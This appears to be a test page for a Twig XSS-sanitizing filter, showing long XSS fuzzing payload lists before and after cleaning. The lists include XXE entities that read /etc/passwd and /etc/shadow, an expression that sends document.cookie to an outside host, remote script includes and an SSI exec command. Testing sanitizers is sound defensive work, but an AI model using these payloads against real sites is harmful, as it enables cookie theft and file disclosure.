id="fuzzelement1">test</a> <a href="\x1Cjavascript:javascript:alert(207)" id="fuzzelement1">test</a> <a href="javascript\x00:javascript:alert(208)" id="fuzzelement1">test</a> <a href="javascript\x3A:javascript:alert(209)" id="fuzzelement1">test</a> <a href="javascript\x09:javascript:alert(210)" id="fuzzelement1">test</a> <a href="javascript\x0D:javascript:alert(211)" id="fuzzelement1">test</a> <a href="javascript\x0A:javascript:alert(212)" id="fuzzelement1">test</a> `"'><img src=xxx:x \x0Aonerror=javascript:alert(213)> `"'><img src=xxx:x \x22onerror=javascript:alert(214)> `"'><img src=xxx:x \x0Bonerror=javascript:alert(215)> `"'><img src=xxx:x \x0Donerror=javascript:alert(216)> `"'><img src=xxx:x \x2Fonerror=javascript:alert(217)> `"'><img src=xxx:x \x09onerror=javascript:alert(218)> `"'><img src=xxx:x \x0Conerror=javascript:alert(219)> `"'><img src=xxx:x \x00onerror=javascript:alert(220)> `"'><img src=xxx:x \x27onerror=javascript:alert(221)> `"'><img src=xxx:x \x20onerror=javascript:alert(222)> "`'><script>\x3Bjavascript:alert(223)</script> "`'><script>\x0Djavascript:alert(224)</script> "`'><script>\xEF\xBB\xBFjavascript:alert(225)</script> "`'><script>\xE2\x80\x81javascript:alert(226)</script> "`'><script>\xE2\x80\x84javascript:alert(227)</script> "`'><script>\xE3\x80\x80javascript:alert(228)</script> "`'><script>\x09javascript:alert(229)</script> "`'><script>\xE2\x80\x89javascript:alert(230)</script> "`'><script>\xE2\x80\x85javascript:alert(231)</script> "`'><script>\xE2\x80\x88javascript:alert(232)</script> "`'><script>\x00javascript:alert(233)</script> "`'><script>\xE2\x80\xA8javascript:alert(234)</script> "`'><script>\xE2\x80\x8Ajavascript:alert(235)</script> "`'><script>\xE1\x9A\x80javascript:alert(236)</script> "`'><script>\x0Cjavascript:alert(237)</script> "`'><script>\x2Bjavascript:alert(238)</script> "`'><script>\xF0\x90\x96\x9Ajavascript:alert(239)</script> "`'><script>-javascript:alert(240)</script> "`'><script>\x0Ajavascript:alert(241)</script> "`'><script>\xE2\x80\xAFjavascript:alert(242)</script> "`'><script>\x7Ejavascript:alert(243)</script> "`'><script>\xE2\x80\x87javascript:alert(244)</script> "`'><script>\xE2\x81\x9Fjavascript:alert(245)</script> "`'><script>\xE2\x80\xA9javascript:alert(246)</script> "`'><script>\xC2\x85javascript:alert(247)</script> "`'><script>\xEF\xBF\xAEjavascript:alert(248)</script> "`'><script>\xE2\x80\x83javascript:alert(249)</script> "`'><script>\xE2\x80\x8Bjavascript:alert(250)</script> "`'><script>\xEF\xBF\xBEjavascript:alert(251)</script> "`'><script>\xE2\x80\x80javascript:alert(252)</script> "`'><script>\x21javascript:alert(253)</script> "`'><script>\xE2\x80\x82javascript:alert(254)</script> "`'><script>\xE2\x80\x86javascript:alert(255)</script> "`'><script>\xE1\xA0\x8Ejavascript:alert(256)</script> "`'><script>\x0Bjavascript:alert(257)</script> "`'><script>\x20javascript:alert(258)</script> "`'><script>\xC2\xA0javascript:alert(259)</script> "/><img/onerror=\x0Bjavascript:alert(260)\x0Bsrc=xxx:x /> "/><img/onerror=\x22javascript:alert(261)\x22src=xxx:x /> "/><img/onerror=\x09javascript:alert(262)\x09src=xxx:x /> "/><img/onerror=\x27javascript:alert(263)\x27src=xxx:x /> "/><img/onerror=\x0Ajavascript:alert(264)\x0Asrc=xxx:x /> "/><img/onerror=\x0Cjavascript:alert(265)\x0Csrc=xxx:x /> "/><img/onerror=\x0Djavascript:alert(266)\x0Dsrc=xxx:x /> "/><img/onerror=\x60javascript:alert(267)\x60src=xxx:x /> "/><img/onerror=\x20javascript:alert(268)\x20src=xxx:x /> <script\x2F>javascript:alert(269)</script> <script\x20>javascript:alert(270)</script> <script\x0D>javascript:alert(271)</script> <script\x0A>javascript:alert(272)</script> <script\x0C>javascript:alert(273)</script> <script\x00>javascript:alert(274)</script> <script\x09>javascript:alert(275)</script> `"'><img src=xxx:x onerror\x0B=javascript:alert(276)> `"'><img src=xxx:x onerror\x00=javascript:alert(277)> `"'><img src=xxx:x onerror\x0C=javascript:alert(278)> `"'><img src=xxx:x onerror\x0D=javascript:alert(279)> `"'><img src=xxx:x onerror\x20=javascript:alert(280)> `"'><img src=xxx:x onerror\x0A=javascript:alert(281)> `"'><img src=xxx:x onerror\x09=javascript:alert(282)> <script>javascript:alert(283)<\x00/script> <img src=# onerror\x3D"javascript:alert(284)" > <input onfocus=javascript:alert(285) autofocus> <input onblur=javascript:alert(286) autofocus><input autofocus> <video poster=javascript:javascript:alert(287)// <body onscroll=javascript:alert(288)><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><input autofocus> <form id=test onforminput=javascript:alert(289)><input></form><button form=test onformchange=javascript:alert(290)>X <video><source onerror="javascript:javascript:alert(291)"> <video onerror="javascript:javascript:alert(292)"><source> <form><button formaction="javascript:javascript:alert(293)">X <body oninput=javascript:alert(294)><input autofocus> <math href="javascript:javascript:alert(295)">CLICKME</math> <math> <maction actiontype="statusline#http://google.com" xlink:href="javascript:javascript:alert(296)">CLICKME</maction> </math> <frameset onload=javascript:alert(297)> <table background="javascript:javascript:alert(298)"> <!--<img src="--><img src=x onerror=javascript:alert(299)//"> <comment><img src="</comment><img src=x onerror=javascript:alert(300))//"> <![><img src="]><img src=x onerror=javascript:alert(301)//"> <style><img src="</style><img src=x onerror=javascript:alert(302)//"> <li style=list-style:url() onerror=javascript:alert(303)> <div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript:alert(304)></div> <head><base href="javascript://"></head><body><a href="/. /,javascript:alert(305)//#">XXX</a></body> <SCRIPT FOR=document EVENT=onreadystatechange>javascript:alert(306)</SCRIPT> <OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(307)"></OBJECT> <object data="data:text/html;base64,%(base64)s"> <embed src="data:text/html;base64,%(base64)s"> <b <script>alert(308)</script>0 <div id="div1"><input value="``onmouseover=javascript:alert(309)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script> <x '="foo"><x foo='><img src=x onerror=javascript:alert(310)//'> <embed src="javascript:alert(311)"> <img src="javascript:alert(312)"> <image src="javascript:alert(313)"> <script src="javascript:alert(314)"> <div style=width:1px;filter:glow onfilterchange=javascript:alert(315)>x <? foo="><script>javascript:alert(316)</script>"> <! foo="><script>javascript:alert(317)</script>"> </ foo="><script>javascript:alert(318)</script>"> <? foo="><x foo='?><script>javascript:alert(319)</script>'>"> <! foo="[[[Inception]]"><x foo="]foo><script>javascript:alert(320)</script>"> <% foo><x foo="%><script>javascript:alert(321)</script>"> <div id=d><x xmlns="><iframe onload=javascript:alert(322)"></div> <script>d.innerHTML=d.innerHTML</script> <img \x00src=x onerror="alert(323)"> <img \x47src=x onerror="javascript:alert(324)"> <img \x11src=x onerror="javascript:alert(325)"> <img \x12src=x onerror="javascript:alert(326)"> <img\x47src=x onerror="javascript:alert(327)"> <img\x10src=x onerror="javascript:alert(328)"> <img\x13src=x onerror="javascript:alert(329)"> <img\x32src=x onerror="javascript:alert(330)"> <img\x47src=x onerror="javascript:alert(331)"> <img\x11src=x onerror="javascript:alert(332)"> <img \x47src=x onerror="javascript:alert(333)"> <img \x34src=x onerror="javascript:alert(334)"> <img \x39src=x onerror="javascript:alert(335)"> <img \x00src=x onerror="javascript:alert(336)"> <img src\x09=x onerror="javascript:alert(337)"> <img src\x10=x onerror="javascript:alert(338)"> <img src\x13=x onerror="javascript:alert(339)"> <img src\x32=x onerror="javascript:alert(340)"> <img src\x12=x onerror="javascript:alert(341)"> <img src\x11=x onerror="javascript:alert(342)"> <img src\x00=x onerror="javascript:alert(343)"> <img src\x47=x onerror="javascript:alert(344)"> <img src=x\x09onerror="javascript:alert(345)"> <img src=x\x10onerror="javascript:alert(346)"> <img src=x\x11onerror="javascript:alert(347)"> <img src=x\x12onerror="javascript:alert(348)"> <img src=x\x13onerror="javascript:alert(349)"> <img[a][b][c]src[d]=x[e]onerror=[f]"alert(350)"> <img src=x onerror=\x09"javascript:alert(351)"> <img src=x onerror=\x10"javascript:alert(352)"> <img src=x onerror=\x11"javascript:alert(353)"> <img src=x onerror=\x12"javascript:alert(354)"> <img src=x onerror=\x32"javascript:alert(355)"> <img src=x onerror=\x00"javascript:alert(356)"> <a href=java&#1&#2&#3&#4&#5&#6&#7&#8&#11&#12script:javascript:alert(357)>XXX</a> <img src="x` `<script>javascript:alert(358)</script>"` `> <img src onerror /" '"= alt=javascript:alert(359)//"> <title onpropertychange=javascript:alert(360)></title><title title=> <a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(361)></a>"> <!--[if]><script>javascript:alert(362)</script --> <!--[if<img src=x onerror=javascript:alert(363)//]> --> <script src="/\%(jscript)s"></script> <script src="\\%(jscript)s"></script> <object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="javascript:alert(364)" style="behavior:url(#x);"><param name=postdomevents /></object> <a style="-o-link:'javascript:javascript:alert(365)';-o-link-source:current">X <style>p[foo=bar{}*{-o-link:'javascript:javascript:alert(366)'}{}*{-o-link-source:current}]{color:red};</style> <link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(367))%7d <style>@import "data:,*%7bx:expression(javascript:alert(368))%7D";</style> <a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="javascript:alert(369);">XXX</a></a><a href="javascript:javascript:alert(370)">XXX</a> <style>*[{}@import'%(css)s?]</style>X <div style="font-family:'foo&#10;;color:red;';">XXX <div style="font-family:foo}color=red;">XXX <// style=x:expression\28javascript:alert(371)\29> <style>*{x:expression(javascript:alert(372))}</style> <div style=content:url(%(svg)s)></div> <div style="list-style:url(http://foo.f)\20url(javascript:javascript:alert(373));">X <div id=d><div style="font-family:'sans\27\3B color\3Ared\3B'">X</div></div> <script>with(document.getElementById("d"))innerHTML=innerHTML</script> <div style="background:url(/f#&#127;oo/;color:red/*/foo.jpg);">X <div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X <div id="x">XXX</div> <style> #x{font-family:foo[bar;color:green;} #y];color:red;{} </style>

    keyword(s): test

    description: test

    by test | at 2020-11-23 00:09:18

    result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

    result with twig: {{ xss.xss | escape }}:

    <IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097& #0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>

    keyword(s): test

    description: test

    by test | at 2020-11-23 00:07:08

    result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

    < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > <META ; <IMG > <INPUT TYPE="BUTTON" action="alert('XSS')"/> ">

    <IFRAME SRC="alert('XSS');"></IFRAME>">123

    ">

    <IFRAME SRC=# ></IFRAME>123

    <IFRAME SRC="alert('XSS');"></IFRAME> <IFRAME SRC=# ></IFRAME> ">

    <IFRAME SRC=# ></IFRAME>123

    "></iframe><iframe frameborder="0%EF%BB%BF ">

    <IFRAME width="420" height="315" SRC="http://www.youtube.com/embed/sxvccpasgTE" frameborder="0" ></IFRAME>123

    ">

    <iframe width="420" height="315" src="http://www.youtube.com/embed/sxvccpasgTE" frameborder="0" allowfullscreen></iframe>123

    >

    <IFRAME width="420" height="315" frameborder="0" ></IFRAME>Hover the cursor to the LEFT of this Message

    &ParamHeight=250 <IFRAME width="420" height="315" frameborder="0" ></IFRAME> ">

    <IFRAME SRC="alert('XSS');"></IFRAME>">123

    ">

    <IFRAME SRC=# ></IFRAME>123

    <iframe src=http://xss.rocks/scriptlet.html < <IFRAME SRC="alert('XSS');"></IFRAME>

    result with twig: {{ xss.xss | escape }}:

    <IMG SRC=x onkeydown="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onkeypress="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onkeyup="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onclick="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x ondblclick="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onmousedown="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onmousemove="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onmouseout="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onmouseover="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onmouseup="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onmousewheel="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onwheel="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x ondrag="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x ondragend="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x ondragenter="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x ondragleave="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x ondragover="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x ondragstart="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x ondrop="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onscroll="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x oncopy="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x oncut="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onpaste="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onabort="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x oncanplay="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x oncanplaythrough="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x oncuechange="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x ondurationchange="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onemptied="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onended="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onloadeddata="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onloadedmetadata="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onloadstart="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onpause="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onplay="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onplaying="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onprogress="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onratechange="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onseeked="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onseeking="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onstalled="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onsuspend="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x ontimeupdate="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onvolumechange="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onwaiting="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onshow="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x ontoggle="alert(String.fromCharCode(88,83,83))"> <META onpaonpageonpagonpageonpageshowshoweshowshowgeshow="alert(1)"; <IMG SRC=x onload="alert(String.fromCharCode(88,83,83))"> <INPUT TYPE="BUTTON" action="alert('XSS')"/> "><h1><IFRAME SRC="javascript:alert('XSS');"></IFRAME>">123</h1> "><h1><IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>123</h1> <IFRAME SRC="javascript:alert('XSS');"></IFRAME> <IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME> "><h1><IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>123</h1> "></iframe><script>alert(`TEXT YOU WANT TO BE DISPLAYED`);</script><iframe frameborder="0%EF%BB%BF "><h1><IFRAME width="420" height="315" SRC="http://www.youtube.com/embed/sxvccpasgTE" frameborder="0" onmouseover="alert(document.cookie)"></IFRAME>123</h1> "><h1><iframe width="420" height="315" src="http://www.youtube.com/embed/sxvccpasgTE" frameborder="0" allowfullscreen></iframe>123</h1> ><h1><IFRAME width="420" height="315" frameborder="0" onmouseover="document.location.href='https://www.youtube.com/channel/UC9Qa_gXarSmObPX3ooIQZr g'"></IFRAME>Hover the cursor to the LEFT of this Message</h1>&ParamHeight=250 <IFRAME width="420" height="315" frameborder="0" onload="alert(document.cookie)"></IFRAME> "><h1><IFRAME SRC="javascript:alert('XSS');"></IFRAME>">123</h1> "><h1><IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>123</h1> <iframe src=http://xss.rocks/scriptlet.html < <IFRAME SRC="javascript:alert('XSS');"></IFRAME>

    keyword(s): test

    description: test

    by test | at 2020-11-23 00:04:59

    result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

    <body !#$%&()*~+-_.,:;?@[/|\]^`=document.vulnerable=true;> < document.vulnerable=true;a=/XSS/\ndocument.vulnerable=true; <input TYPE="IMAGE" SRC="document.vulnerable=true;"> <body BACKGROUND="document.vulnerable=true;"> <body > <bgsound SRC="document.vulnerable=true;">
    <LAYER SRC="document.vulnerable=true;"></LAYER> <link REL="stylesheet" HREF="document.vulnerable=true;"> <style>li {list-style-image: url("document.vulnerable=true;");</STYLE><UL>
  • XSS 1script3document.vulnerable=true;1/script3 <meta HTTP-EQUIV="refresh" CONTENT="0;url=document.vulnerable=true;"> <meta HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=document.vulnerable=true;"> <IFRAME SRC="document.vulnerable=true;"></iframe> <FRAMESET><FRAME SRC="document.vulnerable=true;"></frameset>
    <style>@im\port'\ja\vasc\ript:document.vulnerable=true';</style> < > > & TYPE="text/javascript" > <style type="text/css">BODY{background:url("document.vulnerable=true")}</style> <!--[if gte IE 4]></object> <XML ID=I><X>]]</xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <XML ID="xss"><I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"> <html><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"></BODY></html> <? echo('document.vulnerable=true <head><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>
    <input type="image" dynsrc="document.vulnerable=true;"> <bgsound src="document.vulnerable=true;"> & < rel="stylesheet" href="document.vulnerable=true;"> <iframe src="document.vulnerable=true;"> <meta http-equiv="refresh" content="0;url=document.vulnerable=true;"> <body >
    <style type="text/javascript">document.vulnerable=true;</style> <object classid="clsid:..." codebase="document.vulnerable=true;"> <style><!--</style> < " ="> & src="" id="X">;</xml>
    [\xC0][\xBC]script>document.vulnerable=true;[\xC0][\xBC]/script> <style>@import'http://www.securitycompass.com/xss.css';</style> <meta HTTP-EQUIV="Link" Content="<http://www.securitycompass.com/xss.css>; REL=stylesheet"> <style>BODY{:url("http://www.securitycompass.com/xssmoz.xml#xss")}</style> <OBJECT TYPE="text/x-scriptlet" DATA="http://www.securitycompass.com/scriptlet.html"></object> <HTML xmlns:xss><?import namespace="xss" implementation="http://www.securitycompass.com/xss.htc">XSS</html> '"--> " SRC="http://www.securitycompass.com/xss.js"> " '' SRC="http://www.securitycompass.com/xss.js">" SRC="http://www.securitycompass.com/xss.js"> [Mozilla] ";>;<;BODY !#$%&;()*~+-_.,:;?@[/|\]^`=alert(";XSS";)>; <;/script>;<;script>;alert(1)<;/script>; <;/br >; <;scrscriptipt>;alert(1)<;/scrscriptipt>; <;br size=\";&;{alert('XSS')}\";>; perl -e 'print \";<;IMG SRC=java\0script:alert(\";XSS\";)>;\";;' >; out perl -e 'print \";<;SCR\0IPT>;alert(\";XSS\";)<;/SCR\0IPT>;\";;' >; out <~/XSS/*-*/> <~/XSS/*-*/> <~/XSS/*-*/> <~/XSS > "> XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))> XSS STYLE=xss:e/**/xpression(alert('XSS'))> >">& "><STYLE>@import"alert('XSS')";</STYLE> >"'><> >%22%27><> '%uff1cscript%uff1ealert('XSS')%uff1c/script%uff1e' "> >" '';!--"= < > < > &> <>#115;crip&<>#116;:ale&<>#114;t('XS<>;S')> <>#0000118as&<>#0000099ri&<>#0000112t:&<>#0000097le&<>#0000114t(&<>#0000039XS&<>#0000083')> <>#>#>#> < >'> < >'> &> & version="1.0" encoding="ISO-8859-1"><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('gotcha');<![CDATA[<]]>/SCRIPT<![CDATA[>]]> <?xml version="1.0" encoding="ISO-8859-1"?><![CDATA[' or 1=1 or ''=']]> <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file://c:/boot.ini">]>&xee; <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>&xee; <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/shadow">]>&xee; <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///dev/random">]>&xee; %3cscript%3ealert('XSS')%3c/script%3e %22%3e%3cscript%3ealert('XSS')%3c/script%3e < > < > <><> > < src=""> < > < > < BACKGROUND="alert('XSS')"> <BODY > <INPUT TYPE="IMAGE" SRC="alert('XSS');"> alert("XSS");//<alert()ipt> ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->'> =(◕_◕)= <iframe src="http://ha.ckers.org/scriptlet.html"></iframe> <;/script>;<;script>;alert(1)<;/script>;

    result with twig: {{ xss.xss | escape }}:

    <script>document.vulnerable=true;</script> <img SRC="jav ascript:document.vulnerable=true;"> <img SRC="javascript:document.vulnerable=true;"> <img SRC=" &#14; javascript:document.vulnerable=true;"> <body onload!#$%&()*~+-_.,:;?@[/|\]^`=document.vulnerable=true;> <<SCRIPT>document.vulnerable=true;//<</SCRIPT> <script <B>document.vulnerable=true;</script> <img SRC="javascript:document.vulnerable=true;" <iframe src="javascript:document.vulnerable=true; < <script>a=/XSS/\ndocument.vulnerable=true;</script> \";document.vulnerable=true;;// </title><SCRIPT>document.vulnerable=true;</script> <input TYPE="IMAGE" SRC="javascript:document.vulnerable=true;"> <body BACKGROUND="javascript:document.vulnerable=true;"> <body ONLOAD=document.vulnerable=true;> <img DYNSRC="javascript:document.vulnerable=true;"> <img LOWSRC="javascript:document.vulnerable=true;"> <bgsound SRC="javascript:document.vulnerable=true;"> <br SIZE="&{document.vulnerable=true}"> <LAYER SRC="javascript:document.vulnerable=true;"></LAYER> <link REL="stylesheet" HREF="javascript:document.vulnerable=true;"> <style>li {list-style-image: url("javascript:document.vulnerable=true;");</STYLE><UL><LI>XSS <img SRC='vbscript:document.vulnerable=true;'> 1script3document.vulnerable=true;1/script3 <meta HTTP-EQUIV="refresh" CONTENT="0;url=javascript:document.vulnerable=true;"> <meta HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:document.vulnerable=true;"> <IFRAME SRC="javascript:document.vulnerable=true;"></iframe> <FRAMESET><FRAME SRC="javascript:document.vulnerable=true;"></frameset> <table BACKGROUND="javascript:document.vulnerable=true;"> <table><TD BACKGROUND="javascript:document.vulnerable=true;"> <div STYLE="background-image: url(javascript:document.vulnerable=true;)"> <div STYLE="background-image: url(&#1;javascript:document.vulnerable=true;)"> <div STYLE="width: expression(document.vulnerable=true);"> <style>@im\port'\ja\vasc\ript:document.vulnerable=true';</style> <img STYLE="xss:expr/*XSS*/ession(document.vulnerable=true)"> <XSS STYLE="xss:expression(document.vulnerable=true)"> exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(document.vulnerable=true)'> <style TYPE="text/javascript">document.vulnerable=true;</style> <style>.XSS{background-image:url("javascript:document.vulnerable=true");}</STYLE><A CLASS=XSS></a> <style type="text/css">BODY{background:url("javascript:document.vulnerable=true")}</style> <!--[if gte IE 4]><SCRIPT>document.vulnerable=true;</SCRIPT><![endif]--> <base HREF="javascript:document.vulnerable=true;//"> <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.vulnerable=true></object> <XML ID=I><X><C><![<IMG SRC="javas]]<![cript:document.vulnerable=true;">]]</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></span> <XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:document.vulnerable=true"></B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></span> <html><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>document.vulnerable=true</SCRIPT>"></BODY></html> <? echo('<SCR)';echo('IPT>document.vulnerable=true</SCRIPT>'); ?> <meta HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>document.vulnerable=true</SCRIPT>"> <head><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-document.vulnerable=true;+ADw-/SCRIPT+AD4- <a href="javascript#document.vulnerable=true;"> <div onmouseover="document.vulnerable=true;"> <img src="javascript:document.vulnerable=true;"> <img dynsrc="javascript:document.vulnerable=true;"> <input type="image" dynsrc="javascript:document.vulnerable=true;"> <bgsound src="javascript:document.vulnerable=true;"> &<script>document.vulnerable=true;</script> &{document.vulnerable=true;}; <img src=&{document.vulnerable=true;};> <link rel="stylesheet" href="javascript:document.vulnerable=true;"> <iframe src="vbscript:document.vulnerable=true;"> <img src="mocha:document.vulnerable=true;"> <img src="livescript:document.vulnerable=true;"> <a href="about:<script>document.vulnerable=true;</script>"> <meta http-equiv="refresh" content="0;url=javascript:document.vulnerable=true;"> <body onload="document.vulnerable=true;"> <div style="background-image: url(javascript:document.vulnerable=true;);"> <div style="behaviour: url([link to code]);"> <div style="binding: url([link to code]);"> <div style="width: expression(document.vulnerable=true;);"> <style type="text/javascript">document.vulnerable=true;</style> <object classid="clsid:..." codebase="javascript:document.vulnerable=true;"> <style><!--</style><script>document.vulnerable=true;//--></script> <<script>document.vulnerable=true;</script> <![<!--]]<script>document.vulnerable=true;//--></script> <!-- -- --><script>document.vulnerable=true;</script><!-- -- --> <img src="blah"onmouseover="document.vulnerable=true;"> <img src="blah>" onmouseover="document.vulnerable=true;"> <xml src="javascript:document.vulnerable=true;"> <xml id="X"><a><b><script>document.vulnerable=true;</script>;</b></a></xml> <div datafld="b" dataformatas="html" datasrc="#X"></div> [\xC0][\xBC]script>document.vulnerable=true;[\xC0][\xBC]/script> <style>@import'http://www.securitycompass.com/xss.css';</style> <meta HTTP-EQUIV="Link" Content="<http://www.securitycompass.com/xss.css>; REL=stylesheet"> <style>BODY{-moz-binding:url("http://www.securitycompass.com/xssmoz.xml#xss")}</style> <OBJECT TYPE="text/x-scriptlet" DATA="http://www.securitycompass.com/scriptlet.html"></object> <HTML xmlns:xss><?import namespace="xss" implementation="http://www.securitycompass.com/xss.htc"><xss:xss>XSS</xss:xss></html> <script SRC="http://www.securitycompass.com/xss.jpg"></script> <!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://www.securitycompass.com/xss.js></SCRIPT>'"--> <script a=">" SRC="http://www.securitycompass.com/xss.js"></script> <script =">" SRC="http://www.securitycompass.com/xss.js"></script> <script a=">" '' SRC="http://www.securitycompass.com/xss.js"></script> <script "a='>'" SRC="http://www.securitycompass.com/xss.js"></script> <script a=`>` SRC="http://www.securitycompass.com/xss.js"></script> <script a=">'>" SRC="http://www.securitycompass.com/xss.js"></script> <script>document.write("<SCRI");</SCRIPT>PT SRC="http://www.securitycompass.com/xss.js"></script> <div style="binding: url(http://www.securitycompass.com/xss.js);"> [Mozilla] ";>;<;BODY onload!#$%&;()*~+-_.,:;?@[/|\]^`=alert(";XSS";)>; <;/script>;<;script>;alert(1)<;/script>; <;/br style=a:expression(alert())>; <;scrscriptipt>;alert(1)<;/scrscriptipt>; <;br size=\";&;{alert(&#039;XSS&#039;)}\";>; perl -e &#039;print \";<;IMG SRC=java\0script:alert(\";XSS\";)>;\";;&#039; >; out perl -e &#039;print \";<;SCR\0IPT>;alert(\";XSS\";)<;/SCR\0IPT>;\";;&#039; >; out <~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))> <~/XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.procheckup.com/?sid="%2bdocument.cookie)> <~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))> <~/XSS STYLE=xss:expression(alert('XSS'))> "><script>alert('XSS')</script> </XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))> XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))> XSS STYLE=xss:e/**/xpression(alert('XSS'))> </XSS STYLE=xss:expression(alert('XSS'))> >"><script>alert("XSS")</script>& "><STYLE>@import"javascript:alert('XSS')";</STYLE> 